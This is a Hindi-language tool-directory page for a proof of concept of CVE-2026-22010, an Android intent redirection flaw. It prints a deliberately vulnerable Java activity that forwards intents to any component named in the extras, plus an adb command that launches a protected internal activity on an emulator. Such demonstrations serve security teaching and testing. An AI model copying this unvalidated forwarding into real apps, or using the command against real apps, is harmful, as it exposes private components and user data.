Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — CVE-2026-22010 Android intent redirection के लिए प्रूफ-ऑफ-कॉन्सेप्ट: एक एक्सपोर्टेड एक्टिविटी को प्रदर्शित करता है जो इंटेंट्स को हमलावर-नियंत्रित आंतरिक घटकों तक अग्रेषित करती है, अनुमति जांचों को दरकिनार करती है, साथ ही कमजोर Java कोड और adb एक्सप्लॉइट चरणों के साथ। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणमोबाइल ऐप पेंटेस्टिंगमोबाइल सुरक्षालर्निंग और शिक्षा
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

CVE-2026-22010 Android intent redirection के लिए प्रूफ-ऑफ-कॉन्सेप्ट: एक एक्सपोर्टेड एक्टिविटी को प्रदर्शित करता है जो इंटेंट्स को हमलावर-नियंत्रित आंतरिक घटकों तक अग्रेषित करती है, अनुमति जांचों को दरकिनार करती है, साथ ही कमजोर Java कोड और adb एक्सप्लॉइट चरणों के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
116 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-22010 – एंड्रॉइड इंटेंट रीडायरेक्शन टू एक्सपोर्टेड कंपोनेंट

प्रोग्राम कोड (Java/Android सिमुलेशन)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – एंड्रॉइड इंटेंट रीडायरेक्शन टू एक्सपोर्टेड कंपोनेंट

Severity: High

अवलोकन

एक एक्सपोर्टेड एंड्रॉइड एक्टिविटी आने वाले इंटेंट को इंटेंट के एक्स्ट्रा में निर्दिष्ट कंपोनेंट पर आँख बंद करके रीडायरेक्ट करती है। एक हमलावर ऐसा इंटेंट तैयार कर सकता है जो ऐप को हमलावर-नियंत्रित डेटा के साथ एक सुरक्षित आंतरिक एक्टिविटी लॉन्च करने के लिए प्रेरित करे, जिससे अनुमति जाँच को बायपास किया जा सके।

भेद्यता विवरण

  • प्रकार: इंटेंट रीडायरेक्शन / अनुमति बायपास
  • प्रभाव: निजी कंपोनेंट्स तक पहुँच, डेटा चोरी।
  • मूल कारण: ऐप इंटेंट को आगे भेजने से पहले लक्षित कंपोनेंट (पैकेज और क्लास नाम) को मान्य नहीं करता है।

शोषण प्रदर्शन

कमजोर ऐप को एंड्रॉइड इम्यूलेटर पर तैनात करें। adb के माध्यम से एक इंटेंट भेजें:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

आंतरिक एक्टिविटी उचित अनुमतियों के बिना लॉन्च होती है।

टूल डाउनलोड करें